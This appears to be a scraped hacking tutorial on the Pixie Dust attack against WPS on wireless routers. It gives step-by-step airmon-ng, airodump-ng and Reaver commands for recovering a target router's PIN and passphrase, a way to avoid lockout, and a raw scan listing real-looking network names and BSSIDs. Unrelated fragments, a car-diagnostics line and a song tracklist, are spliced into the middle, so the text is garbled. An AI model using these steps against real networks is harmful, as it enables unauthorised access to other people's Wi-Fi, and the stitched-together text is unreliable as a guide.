Pixie Dust Attack WPS with Reaver In this tutorial we are going to do a pixie dust attack using Reaver 1.5.2, Aircrack-NG and Pixiewps. Pixie Dust attack is an offline attack which exploits a WPS vulnerability. The tool, Pixiewps, is written in C and works with a modified version of Reaver. When a wireless router is vulnerable for this attack retrieving the passphrase can be done in seconds.

A link to the list of pixie dust vulnerable routers is included at the bottom of this tutorial. Pixie Dust Attack Let’s put the wifi interface in monitoring mode using: airmon-ng start wlan0 If necessary kill the processes Kali is complaining about: For anyone getting the following error in Kali Linux 2.0 Sana: [X] ERROR: Failed to open ‘wlan0mon’ for capturing Try the following as a solution: 1.

Sp daten v49 2017. Control unit found: AHM_70 Need IHKA60_2 and D62M57A0-files too.

Put the device in Monitor mode Airmon-ng start wlan0 2. A monitoring interface will be started on wlan0mon 3. Use iwconfig to check if the interface MODE is in managed mode, if so then change it to monitor instead of managed with the following commands: ifconfig wlan0mon down iwconfig wlan0mon mode monitor ifconfig wlan0mon up 4. Iwconfig check if the mode is monitoring mode now 5. Airodump-ng wlan0mon Start airodump-ng to get the BSSID, MAC address and channel of our target.

You Can't Always do What You Like 12. Skunk My Love Will Fall 9. You're Too Expensive for Me 8. You Saved Me 10. Feeling the Itch 11.

Airodump-ng -i wlan0mon Now pick the target and use the BSSID and the channel for Reaver: Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel] We need the PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce and the authkey from Reaver to use for pixiewps. Now start pixiewps with the following arguments: Components: – E-Hash1 is a hash in which we brute force the first half of the WPS PIN. – E-Hash2 is a hash in which we brute force the second half of the WPS PIN. – HMAC is a function that hashes all the data in parenthesis. The function is HMAC-SHA-256. – PSK1 is the first half of the router’s WPS PIN (10,000 possibilities) – PSK2 is the second half of the router’s WPS PIN (1,000 or 10,000 possibilities depending if we want to compute the checksum. We just do 10,000 because it makes no time difference and it’s just easier.) – PKE is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange and prevent replays.) – PKR is the Public Key of the Registrar (used to verify the legitimacy of a WPS exchange and prevent replays.) This router does not seem to be vulnerable to pixie dust attack.

Avoiding Reaver router lock-out with Pixiedust loop When using the -P (Pixiedust loop) option, Reaver goes into a loop mode that breaks the WPS protocol by not using M4 message to avoid lockouts. This option can only be used for PixieHash collecting to use with pixiewps. Thanks for watching and please subscribe to my for more hacking tutorials:) More information: Database with routers vulnerable to the pixie dust attack: Pixie WPS on github: Modified Reaver with pixie dust attack: If you’re interested in learning more about WiFi hacking and wireless in general, you can follow any of these online courses: Online Hacking Courses Learn Wi-fi Hacking/Penetration Testing From Scratch This course contains 50 Videos to learn practical attacks to test the security of Wi-fi and wired networks from scratch using Linux. Learn Penetration Testing using Android From Scratch 40+ Videos to learn how to use Android to test the security of networks and computer systems. Airmon-ng start wlan1Found 2 processes that could cause tlobure.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!PID Name2785 dhclient32790 dhclient3Process with PID 2790 (dhclient3) is running on interface wlan0Interface Chipset Driverwlan1 Atheros AR9271 ath9k [phy1] (monitor mode enabled on mon0)wlan0 Broadcom b43 [phy0]airodump-ng mon0BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:4D:16:E4:67 -62 43 0 0 5 54e WPA TKIP PSK DARKANGEL_Netzwerk C0:25:06:A9:8C:62 -75 24 0 0 11 54e. WPA2 CCMP PSK FRITZ!Box Fon WLAN 7390 68:7F:74:01:FA:FC -75 22 0 0 11 54 WPA2 CCMP PSK lufthaken C0:25:06:41:EE:4A -76 20 0 0 1 54e WPA2 CCMP PSK FRITZ!Box Fon WLAN 7112 C0:25:06:DC:B0:A4 -77 21 0 0 1 54e.